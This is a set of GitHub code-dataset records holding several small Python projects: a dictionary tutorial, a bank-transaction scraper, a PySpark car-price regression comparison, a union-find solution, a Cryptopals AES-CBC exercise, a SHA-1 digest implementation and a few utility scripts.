valor}\r\n# chave = indica o que eu vou armazenar\r\n# valor = o dado que eu quero armazenar\r\n\r\npessoa = {'Nome': 'Tiago',\r\n 'Idade': 17,\r\n 'Cidade': 'Taboão da Serra'}\r\n\r\n\r\npessoas = [\r\n {'Nome': 'Tiago',\r\n 'Idade': 17,\r\n 'Cidade': 'Taboão da Serra'},\r\n\r\n {'Nome': 'João',\r\n 'Idade': 19,\r\n 'Cidade': 'Mogi das Cruzes'},\r\n\r\n {'Nome': 'Rodrigo',\r\n 'Idade': 5,\r\n 'Cidade': 'Embu das Artes'}\r\n\r\n] \r\n\r\nprint(pessoas[2]['Nome'])\r\n","repo_name":"Tiaguh/Python-Curso-PSW-4.0","sub_path":"Conceitos Básicos/Estrutura de dados/Dicionarios.py","file_name":"Dicionarios.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6213677325","text":"import io\nimport os\nimport traceback\n\nfrom ruamel.yaml import YAML\nfrom selenium.webdriver import ChromeOptions\nfrom splinter import Browser\n\nfrom src.converters.converter import convert\nfrom src.extractors import extract\nfrom src.writers import write\n\n\nclass Struct:\n def __init__(self, **kwargs):\n for key in kwargs:\n if type(kwargs[key]) is dict:\n kwargs[key] = Struct(**kwargs[key])\n elif type(kwargs[key]) is list:\n kwargs[key] = [Struct(**x) if type(x) in (dict, list) else x for x in kwargs[key]]\n self.__dict__.update(kwargs)\n\n\nclass Main:\n def __init__(self, config, last_transaction):\n self.last_transaction = last_transaction\n self.config = config\n\n def execute(self):\n if self.config.options.browser.enable:\n options = ChromeOptions()\n options.add_argument('--log-level=3')\n with Browser('chrome', executable_path=chrome_driver_path, headless=self.config.options.browser.headless,\n incognito=self.config.options.browser.incognito, options=options) as browser:\n self._execute(browser)\n else:\n self._execute(None)\n\n def _execute(self, browser):\n transactions = []\n for extractor_config in self.config.extractors:\n extracted_transaction = extract(extractor_config, browser, self.last_transaction, self.config.options)\n transactions += convert(extracted_transaction, extractor_config.transaction.converters)\n\n if len(transactions) > 0:\n write(self.config.writer, transactions)\n\n\ntry:\n yaml = YAML(typ=\"safe\", pure=True)\n yaml.register_class(Struct)\n chrome_driver_path = os.path.join(os.getcwd(), 'chromedriver.exe')\n\n with io.open('config.yml', mode='r', encoding='utf-8') as _f:\n _config = Struct(**yaml.load(_f))\n\n with io.open('last-transaction.yml', mode='r', encoding='utf-8') as _f:\n _last_transaction = yaml.load(_f)\n if not isinstance(_last_transaction, Struct):\n _last_transaction = Struct(**_last_transaction)\n\n Main(_config, _last_transaction).execute()\n\n if _config.options.rememberLastTransaction:\n with io.open('last-transaction.yml', mode='w', encoding='utf-8') as _f:\n yaml.dump(_last_transaction, _f)\nexcept Exception:\n print(traceback.format_exc())\n\ninput(\"Press Enter to end...\")\n","repo_name":"FennecFox100/BankTransactionsTransfer","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43980752776","text":"from io import BytesIO, StringIO\nfrom google.cloud import storage\n\nimport pyspark\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkContext, SparkConf \nfrom pyspark.sql import types\nfrom pyspark.sql import functions as F\nfrom pyspark.ml.feature import Imputer, VectorAssembler, StringIndexer, 
OneHotEncoder\nfrom pyspark.sql.types import StringType, IntegerType, StructType, StructField, DoubleType\nfrom pyspark.sql.functions import when, upper, avg, year, to_date, sqrt, log, lower, col, row_number, asc, lit, count, expr, percentile_approx, monotonically_increasing_id, udf, skewness, regexp_extract\nfrom pyspark.sql.window import Window\n#from plotly.offline import iplot\n#import plotly.graph_objs as go\nfrom pyspark.sql.functions import round\n#import plotly.express as px\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.regression import LinearRegression, IsotonicRegression, FMRegressor, DecisionTreeRegressor, RandomForestRegressor, GBTRegressor, GeneralizedLinearRegression\nfrom pyspark.ml import Pipeline\n\n# Utilities\nimport os\n\n# Numpy & Pandas\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#import pandas_profiling as pp\nimport time\nimport psutil\n\n# Others (warnings etc)\nfrom warnings import simplefilter\n\n\n# Create a SparkSession\nspark = SparkSession.builder.config('...').master('yarn').appName('egd').getOrCreate()\n# spark = SparkSession.builder.config('spark.driver.memory', '1g').config('spark.executor.memory', '4g') \\\n# .config('spark.executor.instances', '2').config(conf=conf).config('spark.executor.cores','2').config('spark.driver.maxResultSize', '1g') \\\n# .master('yarn').appName('egd').getOrCreate()\n\nfile_path = 'gs://egd-project-vp-1/egd-project/notebooks_jupyter_notebooks_jupyter_vehicles.csv'\ndf = (spark.read.format('csv').option('header', 'true').option('inferSchema','true').load(file_path))\n\n# CLEANING SIMPLIFIED # \n\n# Determine and remove the columns to drop based on the above graph\ncols_to_drop = ['id','url', 'region', 'region_url', 'VIN', 'image_url', 'description', \\\n 'county', 'size', 'paint_color', 'drive', 'cylinders', 'state', 'lat','long']\nvehicles_df = df.select([col(c) for c in df.columns if c not in cols_to_drop])\n\n# Remove null values and duplicated rows\nvehicles_df = vehicles_df.dropna().dropDuplicates()\n\n# Drop NaNs and duplicates\nvehicles_df = vehicles_df.dropna().dropDuplicates()\n\n# Add index column using monotonically_increasing_id() function\nvehicles_df = vehicles_df.withColumn(\"index\", monotonically_increasing_id())\n\n# Change data type of year to string\nvehicles_df = vehicles_df.withColumn(\"year\", col(\"year\").cast(\"string\"))\n\n# Reorder columns with index first\nvehicles_df = vehicles_df.select(\"index\", *vehicles_df.columns[:-1])\n\n# Describing the dataset to get a basic idea of the non-categorical features\nvehicles_df.select([col(c).cast(\"float\") for c in vehicles_df.columns if c not in ['manufacturer', 'model', 'condition', 'fuel', 'title_status', 'transmission', 'type']])\n\n# Create a new Spark DataFrame with the filtered data\nvehicles_prc = vehicles_df.filter((vehicles_df.price >= 2000) & (vehicles_df.price <= 50000))\n\nvehicles_odo = vehicles_prc.filter((col(\"odometer\") > 100) & (col(\"odometer\") <= 200000))\n\nyear_list = list(range(2000, 2021))\nvehicles_year = vehicles_odo.filter(col('year').cast(IntegerType()).isin(year_list))\n\n# Convert posting_date to a date type\nvehicles_year = vehicles_year.withColumn('posting_date', to_date('posting_date'))\n\n# Add a new column for age of cars\nvehicles_year = vehicles_year.withColumn('age', year('posting_date') - vehicles_year['year'])\n\n# Group by condition and title_status columns and aggregate the mean of price\ngrouped_df = 
vehicles_year.groupBy('condition', 'title_status').agg({'price': 'mean'})\n\n# Filter the Spark DataFrame to include only used cars\nvehicles_used = vehicles_year.filter(col('condition') != 'new')\n\n# Filter the Spark DataFrame to exclude cars with title_status 'parts only'\nvehicles_used = vehicles_used.filter(col('title_status') != 'parts only')\n\n# Group by condition and title_status columns and aggregate the mean of price\ngrouped_df = vehicles_used.groupBy('condition', 'title_status').agg({'price': 'mean'})\n\n# Filter the Spark DataFrame to include only used cars\nvehicles_used = vehicles_year.filter(col('condition') != 'new')\n\n# Filter the Spark DataFrame to exclude cars with title_status 'parts only'\nvehicles_used = vehicles_used.filter(col('title_status') != 'parts only')\n\n# Filter the Spark DataFrame to include only used cars\nvehicles_used = vehicles_year.filter(col('condition') != 'new')\n\n# Filter the Spark DataFrame to exclude cars with title_status 'parts only'\nvehicles_used = vehicles_used.filter(col('title_status') != 'parts only')\n\n# Filter the Spark DataFrame to exclude fuel types 'other'\nvehicles_used = vehicles_used.filter(col('fuel') != 'other')\n\n# Filter the Spark DataFrame to exclude transmission types 'other'\nvehicles_used = vehicles_used.filter(col('transmission') != 'other')\n\n# Add a field for row numbers\nvehicles_used = vehicles_used.withColumn(\"row_num\", row_number().over(Window.orderBy(col(\"model\"))))\n\n\n###########\n\n\nprint('-----------------------------------------')\nprint('----------- Price Prediction ------------')\nprint('-----------------------------------------')\nprint('')\n\n\n\n\n\n\n# Get current information of the dataset\nvehicles_used.printSchema()\n\n# Drop columns populated during clean-up or not required\nvehicles_used = vehicles_used.drop('posting_date', 'row_num')\n\n\n# Make a copy of the data frame for encoding\nvehicles_used_enc = vehicles_used\n\n# Print schema of the encoded DataFrame\nvehicles_used_enc.printSchema()\nvehicles_used_enc2 = vehicles_used_enc\n\n\nvehicles_used_enc2.show()\n\n# Cast the string column to double\nvehicles_used_enc = vehicles_used_enc.withColumn(\"price\", col(\"price\").cast(\"long\"))\n\nvehicles_used_enc = vehicles_used_enc.withColumn(\"odometer\", col(\"odometer\").cast(\"double\"))\n\n\nfrom pyspark.ml.feature import StringIndexer, OneHotEncoder\nfrom pyspark.ml import Pipeline\n\n# Get fields that are categorical and remove only \"model\"\ncat_features = [c for c, dtype in vehicles_used_enc.dtypes if dtype == 'string']\nprint(f'Categorical features: {cat_features}\\n\\n')\n\n# Encode using StringIndexer\nfor c in cat_features:\n indexer = StringIndexer(inputCol=c, outputCol=c+\"_indexed\")\n model = indexer.fit(vehicles_used_enc)\n vehicles_used_enc = model.transform(vehicles_used_enc).drop(c)\n vehicles_used_enc = vehicles_used_enc.withColumnRenamed(c+\"_indexed\", c)\n\n\n# drop row number column\nvehicles_used_enc = vehicles_used_enc.drop(\"index\")\nvehicles_used_enc.show()\n\nvehicles_used_enc.printSchema()\n\n\n\nfeatures = VectorAssembler(inputCols = [\n 'odometer',\n 'age',\n 'year',\n 'manufacturer',\n 'model',\n 'condition',\n 'fuel',\n 'title_status',\n 'transmission',\n 'type'],outputCol='features', handleInvalid = 'skip')\n\ntraining_features = features.transform(vehicles_used_enc)\ntraining_features = training_features.select('price','features')\nprint('\\n--- ML dataset ---\\n')\ntraining_features.show(5)\n#split ML dataset in train (.8) and test 
(.2)\ntrain_data, test_data = training_features.randomSplit([0.8,0.2])\nprint('\\n--- Train Data ---\\n')\ntrain_data.show(5)\nprint('\\n--- Test Data ---\\n')\ntest_data.show(5)\nprint('\\n--- Data Used for the Prediction---\\n')\n# randomly sample 5% of the data for testing\ntest_data_sample = test_data.sample(fraction=0.05, seed=123)\n\n# display the first rows of the DataFrame\ntest_data_sample.show(5)\n\n\n\ndef reg_metrics(model, train_data, test_data, algo):\n    \"\"\" Function takes in training and testing sets, prediction model, \n    and outputs the below metrics:\n    1. R² or Coefficient of Determination.\n    2. Adjusted R²\n    3. Mean Squared Error(MSE)\n    4. Root-Mean-Squared-Error(RMSE).\n    5. Mean-Absolute-Error(MAE).\n    \"\"\"\n    # Get predicted values on test_data\n    test_pred = model.transform(test_data)\n    \n    #1 & 2 Coefficient of Determination (R² & Adjusted R²)\n    print(\"\\n\\t--- Coefficient of Determination (R² & Adjusted R²) ---\")\n    evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"r2\")\n    r2 = evaluator.evaluate(test_pred)\n    adj_r2 = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"r2adj\")\n    adj_r2 = evaluator.evaluate(test_pred)  # NOTE: this reuses the r2 evaluator above, so the reported Adjusted R² equals R²\n\n    print(f\"R²\\t\\t: {r2:.5f}\")\n    print(f\"Adjusted R²\\t: {adj_r2:.5f}\")\n\n    #3 & 4. MSE and RMSE\n    print(\"\\n\\t--- Mean Squared Error (MSE & RMSE) ---\")\n    mse_evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"mse\")\n    mse = mse_evaluator.evaluate(test_pred)\n    rmse_evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"rmse\")\n    rmse = rmse_evaluator.evaluate(test_pred)\n    \n    print(f\"MSE\\t: {mse:.4f}\")\n    print(f\"RMSE\\t: {rmse:.2f}\")\n\n    #5. 
MAE\n print(\"\\n\\t--- Mean Absolute Error (MAE) ---\")\n mae_evaluator = RegressionEvaluator(labelCol=\"price\", predictionCol=\"prediction\", metricName=\"mae\")\n mae = mae_evaluator.evaluate(test_pred)\n print(f\"MAE\\t: {mae:.2f}\")\n \n # Return metrics as a dictionary\n metrics_dict = {\n 'Algorithm': algo,\n 'R²': r2,\n 'Adjusted R²': adj_r2,\n 'MSE': mse,\n 'RMSE': rmse,\n 'MAE': mae\n }\n #'Adjusted R²': adj_r2_formatted,\n return metrics_dict\n\nmodel_metrics = []\nmodel_metrics_performance = []\n\n# LINEAR REGRESSION #\n# Measure execution time\nstart_time = time.time()\nprint(\"\\t------- Linear Regression -------\")\nlr = LinearRegression(\n featuresCol='features',\n labelCol='price',\n maxIter=100, # increase maxIter\n regParam=0.1, # try different values for regParam\n elasticNetParam=0.7 # try different values for elasticNetParam\n)\nlr_model = lr.fit(train_data)\nmetrics_dict_lr = reg_metrics(lr_model, train_data, test_data, 'Linear Regression')\nmodel_metrics.append(metrics_dict_lr)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = lr_model.evaluate(test_data_sample)\npred_results.predictions.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Linear Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# LASSO REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Lasso Regression -------\")\nlasso = LinearRegression(featuresCol='features', labelCol='price', maxIter=100, regParam=0.1, elasticNetParam=1)\nlasso_model = lasso.fit(train_data)\nmetrics_dict_lasso = reg_metrics(lasso_model, train_data, test_data, 'Lasso Regression')\nmodel_metrics.append(metrics_dict_lasso)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = lasso_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Lasso Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# LASSO REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Ridge Regression -------\")\nridge = LinearRegression(featuresCol = 'features', labelCol = 'price',maxIter=100, regParam=0.3, elasticNetParam=0.1)\nridge_model = ridge.fit(train_data)\nmetrics_dict_ridge = reg_metrics(ridge_model, train_data, test_data, 'Ridge Regression')\nmodel_metrics.append(metrics_dict_ridge)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = ridge_model.evaluate(test_data_sample)\npred_results.predictions.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\n\nmetrics_dict_time = {\n 'Algorithm':'Ridge Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# ISOTONIC REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Isotonic Regression -------\")\niso = IsotonicRegression(labelCol=\"price\", featuresCol=\"features\")\niso_model = iso.fit(train_data)\nmetrics_dict_iso = reg_metrics(iso_model, train_data, test_data, 'Isotonic Regression')\nmodel_metrics.append(metrics_dict_iso)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = iso_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - 
start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Isotonic Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# FACTORIZATION MACHINES REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Factorization Machines Regression -------\")\n# Define the FMRegressor model\nfm = FMRegressor(featuresCol=\"features\", labelCol=\"price\", stepSize=0.01)\n# Train the model on the training data\nfm_model = fm.fit(train_data)\n\n# Evaluate the model on the training and test data\nmetrics_dict_fm = reg_metrics(fm_model, train_data, test_data, 'Factorization Machines Regression')\nmodel_metrics.append(metrics_dict_fm)\nprint(\"\\n\\t--- Predictions ---\")\n# Make predictions on the test data\npred_results = fm_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Factorization Machines',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n\n\n# DECISION TREE #\nstart_time = time.time()\nprint(\"\\t------- Decision Tree -------\")\ndt = DecisionTreeRegressor(featuresCol = 'features', labelCol = 'price', maxDepth=5, maxBins=40000)\ndt_model = dt.fit(train_data)\nmetrics_dict_dt = reg_metrics(dt_model, train_data, test_data, 'Decision Tree')\nmodel_metrics.append(metrics_dict_dt)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = dt_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Decision Tree',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# RANDOM FOREST REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Random Forest Regression -------\")\nrf = RandomForestRegressor(featuresCol = 'features', labelCol = 'price', numTrees=2, maxDepth=2, maxBins=40000)\nrf_model = rf.fit(train_data)\nmetrics_dict_rf = reg_metrics(rf_model, train_data, test_data, 'Random Forest Regression')\nmodel_metrics.append(metrics_dict_rf)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = rf_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Random Forest',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# GRADIENT BOOSTING REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Gradient Boosting Regression -------\")\ngb = GBTRegressor(featuresCol = 'features', labelCol = 'price', maxIter=10, maxDepth=5, seed=42, maxBins=40000)\ngb_model = gb.fit(train_data)\nmetrics_dict_gb = reg_metrics(gb_model, train_data, test_data, 'Gradient Boost Regression')\nmodel_metrics.append(metrics_dict_gb)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = gb_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\nmetrics_dict_time = {\n 'Algorithm':'Gradient Boosting',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n 
}\nmodel_metrics_performance.append(metrics_dict_time)\n\n\n# GENERALIZED LINEAR REGRESSION #\nstart_time = time.time()\nprint(\"\\t------- Generalized Linear Regression -------\")\nglr = GeneralizedLinearRegression(featuresCol = 'features', labelCol = 'price',family=\"gaussian\", link=\"identity\", maxIter=10, regParam=0.3)\nglr_model = glr.fit(train_data)\nmetrics_dict_glr = reg_metrics(glr_model, train_data, test_data, 'Generalized Linear Regression')\nmodel_metrics.append(metrics_dict_glr)\nprint(\"\\n\\t--- Predictions ---\")\npred_results = glr_model.transform(test_data_sample)\npred_results.show(5)\n\nend_time = time.time()\nelapsed_time = end_time - start_time\n# Measure CPU usage\ncpu_usage = psutil.cpu_percent()\n\n\nmetrics_dict_time = {\n 'Algorithm':'Generalized Linear Regression',\n 'Execution Time': elapsed_time,\n 'CPU usage': cpu_usage\n }\nmodel_metrics_performance.append(metrics_dict_time)\n\n\nprint('------------------------------------------')\nprint('----------- Models Comparison ------------')\nprint('------------------------------------------')\nprint('')\n\n\n# Create a Spark DataFrame from the list of dictionaries\ndf_models1 = spark.createDataFrame(model_metrics)\n\n# Select columns in desired order and round the values to two decimal places\ndf_models = df_models1.withColumn(\"MSE\", col(\"MSE\").cast(\"decimal(20,2)\")).select(\"Algorithm\", \n round(\"R²\", 2).alias(\"R²\"), \n round(\"Adjusted R²\", 2).alias(\"Adjusted R²\"), \n \"MSE\", \n round(\"RMSE\", 2).alias(\"RMSE\"), \n round(\"MAE\", 2).alias(\"MAE\"))\n\n# Set the option to display the full column width\ndf_models.show()\n\n\n\n# Define the schema of the DataFrame\nschema = StructType([\n StructField(\"Algorithm\", StringType(), True),\n StructField(\"Execution Time\", DoubleType(), True),\n StructField(\"CPU usage\", DoubleType(), True),\n\n])\n\n# Create the DataFrame using the schema\ndf_models_performance = spark.createDataFrame(model_metrics_performance, schema=schema)\ndf_models_performance.show()\n","repo_name":"LuisPHenriques/EGD_Project","sub_path":"notebook-to-py/price-prediction.py","file_name":"price-prediction.py","file_ext":"py","file_size_in_byte":18075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25637812430","text":"class Solution:\n def validPath(self, n: int, edges: List[List[int]], source: int, destination: int) -> bool:\n\n dic = {i : i for i in range(n)}\n \n def find(ind):\n if dic[ind] != ind:\n dic[ind] = find(dic[ind])\n return dic[ind]\n return ind\n \n def union(x,y):\n xrep = find(x)\n yrep = find(y)\n \n dic[xrep] = yrep\n \n for x,y in edges:\n union(x,y)\n \n return find(source) == find(destination)","repo_name":"natiyeshi/A2SVproblems","sub_path":"find-if-path-exists-in-graph.py","file_name":"find-if-path-exists-in-graph.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19877962910","text":"\"\"\"S2C10. 
Implement CBC mode.\"\"\"\r\n\r\nimport base64\r\n\r\nfrom set_1 import c02_fixed_xor as xor\r\nfrom set_1 import c07_aes_in_ecb_mode as aes_ecb\r\nfrom set_2 import c09_pkcs7_padding as pkcs7_padding\r\n\r\n\r\nBLOCK_SIZE = 16\r\n\r\n\r\ndef aes_cbc(text, key, iv, encrypt=False): # pylint: disable=invalid-name\r\n    \"\"\"Encrypts or decrypts using AES in CBC mode.\"\"\"\r\n\r\n    # Make len(key) byte ciphertext blocks.\r\n    blocks = [\r\n        text[i:i + BLOCK_SIZE]\r\n        for i in range(0, len(text), BLOCK_SIZE)\r\n    ]\r\n\r\n    state = iv\r\n    out_blocks = b''\r\n    for block in blocks:\r\n        out_blocks += xor.fixed_xor(\r\n            state,\r\n            aes_ecb.aes_ecb(block, key, encrypt=encrypt))\r\n        state = block\r\n\r\n    return pkcs7_padding.unpad(out_blocks)\r\n\r\n\r\nif __name__ == '__main__':\r\n    TEXT = base64.b64decode(''.join([\r\n        line.strip()\r\n        for line in open('c10_aes_in_cbc_mode_file', 'r')\r\n    ]))\r\n    KEY = b'YELLOW SUBMARINE'\r\n    IV = bytes(BLOCK_SIZE)\r\n\r\n    print(aes_cbc(TEXT, KEY, IV, encrypt=False).decode('ascii'))\r\n","repo_name":"yuethomas/cryptopals","sub_path":"set_2/c10_aes_in_cbc_mode.py","file_name":"c10_aes_in_cbc_mode.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32610252076","text":"def digest(word_list, h):\n\n    # Raise exception if input word_list does not have correct number of words\n    if len(word_list) != 80:\n        raise ValueError(\"Inputted list of words must have 80 words, but instead has {} words\".format(str(len(word_list))))\n\n    a = h[0]\n    b = h[1]\n    c = h[2]\n    d = h[3]\n    e = h[4]\n    \n    \n    # Determine which function to use depending on the position of the word in word_list\n    for i in range(len(word_list)):\n\n        if i <= 19:\n            fk = _f1(word_list[i], a,b,c,d)\n\n        elif i <= 39:\n            fk = _f2(word_list[i], a,b,c,d)\n\n        elif i <= 59:\n            fk = _f3(word_list[i], a,b,c,d)\n\n        else:\n            fk = _f4(word_list[i], a,b,c,d)\n\n        # temp = (a left rotate 5) + f + e + k + current word\n        temp = bin(int(_left_rotate(a, 5), 2) + fk[0] + int(e,2) + fk[1] + int(word_list[i], 2))[2:]\n\n        # Truncate left-most bits until temp is 32 bits long\n        temp = _truncate(temp, 32)\n\n        # Change the values of a, b, c, d, e for the next iteration\n        e = d # e = d\n        d = c # d = c\n        c = _left_rotate(b, 30) # c = b left rotate 30\n        b = a # b = a\n        a = temp # a = temp\n\n\n    # 5 parts of the digest, which will be combined after each chunk in sha.py is digested\n    h[0] = _truncate(bin(int(h[0], 2) + int(a, 2))[2:], 32)\n    h[1] = _truncate(bin(int(h[1], 2) + int(b, 2))[2:], 32)\n    h[2] = _truncate(bin(int(h[2], 2) + int(c, 2))[2:], 32)\n    h[3] = _truncate(bin(int(h[3], 2) + int(d, 2))[2:], 32)\n    h[4] = _truncate(bin(int(h[4], 2) + int(e, 2))[2:], 32)\n\n\n    return h\n\n\n    \n\n\n\ndef _f1(word, a, b, c, d):\n\n    # f = (b AND c) OR ((NOT b) AND d)\n    f = (int(b,2) & int(c,2)) | ((~int(b,2)) & int(d,2))\n\n    k = int(\"01011010100000100111100110011001\", 2)\n\n    return f, k\n\n\n\ndef _f2(word, a, b, c, d):\n\n    # f = b XOR c XOR d\n    f = int(b,2) ^ int(c,2) ^ int(d,2)\n\n    k = int(\"01101110110110011110101110100001\", 2)\n\n    return f, k\n\n\n\ndef _f3(word, a, b, c, d):\n\n    # f = (b AND c) OR (b AND d) OR (c AND d)\n    f = (int(b,2) & int(c,2)) | (int(b,2) & int(d,2)) | (int(c,2) & int(d,2))\n\n    k = int(\"10001111000110111011110011011100\", 2)\n\n    return f, k\n\n\n\ndef _f4(word, a, b, c, d):\n\n    # f = b XOR c XOR d\n    f = int(b,2) ^ int(c,2) ^ int(d,2)\n\n    k = int(\"11001010011000101100000111010110\", 2)\n    \n    return f, k\n\n\n\n\ndef 
_left_rotate(binary_string, amount):\n\n temp = binary_string[:amount]\n binary_string = binary_string[amount:] + temp\n return binary_string\n\n\n\n# Truncates from the left\ndef _truncate(binary_string, desired_amount):\n\n if len(binary_string) < desired_amount:\n return binary_string.zfill(desired_amount - len(binary_string))\n \n return binary_string[len(binary_string)-desired_amount:]\n","repo_name":"JoshGutman/SHA-1","sub_path":"digest.py","file_name":"digest.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41243190981","text":"\"\"\"Script for measuring optimality of semantic systems w.r.t the Pareto frontier = RD curve.\"\"\"\n\nimport os\nimport hydra\nimport pandas as pd\nfrom misc import util\nfrom analysis.measure import measure_optimality\n\n\n@hydra.main(version_base=None, config_path=\"../conf\", config_name=\"config\")\ndef main(config):\n util.set_seed(config.seed)\n\n # load datapaths\n cwd = os.getcwd()\n game_dir = cwd.replace(config.filepaths.simulation_subdir, \"\")\n curve_fn = os.path.join(game_dir, config.filepaths.curve_points_save_fn)\n fps = config.filepaths\n sim_fn = os.path.join(cwd, fps.simulation_points_save_fn)\n sampled_fn = os.path.join(game_dir, config.filepaths.sampled_points_save_fn)\n\n # load data\n curve_data = pd.read_csv(curve_fn)\n sim_data = pd.read_csv(sim_fn)\n sampled_data = pd.read_csv(sampled_fn)\n\n sim_optimality = measure_optimality(sim_data, curve_data)\n sim_data[\"optimality\"] = sim_optimality\n\n sampled_optimality = measure_optimality(sampled_data, curve_data)\n sampled_data[\"optimality\"] = sampled_optimality\n\n util.save_points_df(\n fn=sim_fn,\n df=sim_data,\n )\n util.save_points_df(\n fn=sampled_fn,\n df=sampled_data,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nathimel/rdsg","sub_path":"src/optimality.py","file_name":"optimality.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19052259337","text":"import numpy as np\nfrom src.gender_model import GenderModel\nfrom csv import reader, writer\n\ngm = GenderModel()\n\nwith open(\"input.csv\") as csvfile:\n csv_reader = reader(csvfile)\n next(csv_reader)\n rows = list(csv_reader)\n\ncount_accurate = 0\ncount_total = 0\n\nwith open(\"results.csv\", \"w\", newline=\"\") as f:\n csv_writer = writer(f)\n csv_writer.writerow([\"\", \"img_path\", \"gender\", \"prediction\", \"confidence\"])\n\n for row in rows:\n count_total += 1\n prediction = gm.predict(row[1])\n index_prediction = np.argmax(prediction)\n if (index_prediction == 0 and row[2] == \"female\") or (index_prediction == 1 and row[2] == \"male\"):\n count_accurate += 1\n csv_writer.writerow(\n [row[0], row[1], row[2], prediction, max(prediction)]\n )\n\n\ndef calculate_accuracy():\n accuracy = count_accurate / count_total\n print(f\"The model was {np.round(accuracy, 4) * 100}% accurate.\")\n\n\ncalculate_accuracy()\n","repo_name":"nachoiacovino/gsp-python","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30694509217","text":"class Node:\n def __init__(self,val):\n self.data = val\n self.next = None\n\ndef construct(L):\n root = Node(L[0])\n curr = root\n for i in range(1,len(L)):\n curr.next = Node(L[i])\n curr = curr.next\n return root\n\ndef 
